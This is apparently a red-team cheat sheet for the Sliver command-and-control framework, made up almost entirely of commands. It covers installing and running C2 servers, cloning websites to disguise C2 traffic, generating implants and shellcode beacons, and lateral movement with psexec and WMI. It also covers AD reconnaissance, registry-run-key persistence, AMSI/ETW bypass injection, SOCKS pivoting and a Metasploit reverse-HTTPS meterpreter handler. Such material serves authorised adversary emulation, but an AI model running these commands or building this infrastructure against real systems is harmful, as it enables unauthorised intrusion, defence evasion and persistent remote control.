Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. Sliver's implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS. Implants are dynamically compiled with unique X.509 certificates signed by a per-instance certificate authority generated when you first run the binary. Sliver server and client support MacOS, Windows, and Linux. Implants are supported on MacOS, Windows, and Linux.
curl https://sliver.sh/install|sudo bash
cat > /etc/systemd/system/sliver.service << EOL
[Unit]
Description=Sliver Server
After=syslog.target network.target
[Service]
Type=simple
Restart=always
RestartSec=120
LimitNOFILE=20000
Environment=LANG=en_US.UTF-8
ExecStart=/opt/sliver/sliver-server_linux daemon -l 0.0.0.0 -p <port>
[Install]
WantedBy=multi-user.target
EOL
systemctl daemon-reload
systemctl enable --now sliver
apt install letsencrypt -y
apt install apache2 -y
certbot certonly --non-interactive --quiet --register-unsafely-without-email --agree-tos -a webroot --webroot-path=/var/www/html -d <domain>
Clone website with wget.
wget --mirror --convert-links --html-extension <target>
Add content to HTTP(S) C2 websites to make them look more legit.
websites add-content --website <name> --web-path <path> --content ./public --recursive
./sliver-server_linux operator -l <teamserver_ip> -p <teamserver_port> -n <username> -s /tmp/<username>.cfg
sliver-client import /tmp/<username>.cfg
sliver-client
mtls -l 443 -L 0.0.0.0 -p
https -l 443 -L 0.0.0.0 -p
https --domain <domain> --cert /path/cert.pem --key /path/privkey.pem --website <website_name> -p
http -l 80 -L 0.0.0.0 -p
generate beacon --mtls <ip address>:<port> -f shellcode
generate beacon --http <ip address>:<port>
use <beacon_id>
Switching from Beacon Mode to Session Mode
sessions
use <sessions_id>
interactive
sessions -F -K
pivots named-pipe --bind <named_pipe>
profiles new --format service --named-pipe <local_ip>/pipe/<named_pipe> svc-smb-beacon
psexec -d Description -s PAEXEC -p svc-smb-beacon <remote_computer>
sharp-wmi 'action=exec computername=<remote_computer> command="C:\windows\temp\xxx.exe" result=true'
seatbelt -p C:\\Windows\\System32\\werfault.exe -- "-group=user"
sharp-hound-3 -- -c all
sharpup -t 120 -p C:\\Windows\\System32\\werfault.exe audit
sharpersist -- '-t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add'
interactive
use <session>
socks5 start
To run this command need to install extension windows-bypass
unhook-boof
inject-etw-bypass <pid>
inject-amsi-bypass <pid>
Session passing is using one payload to spawn another payload.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_https
set lhost <msf_ip>
set lport <msf_port>
exploit -jz
msf --lhost <msf_ip> --lport <msf_port>
extensions install /path/bof
armory install windows-bypass
armory install windows-pivot
armory install situational-awareness
armory install .net-execute
armory install .net-pivot
armory install .net-recon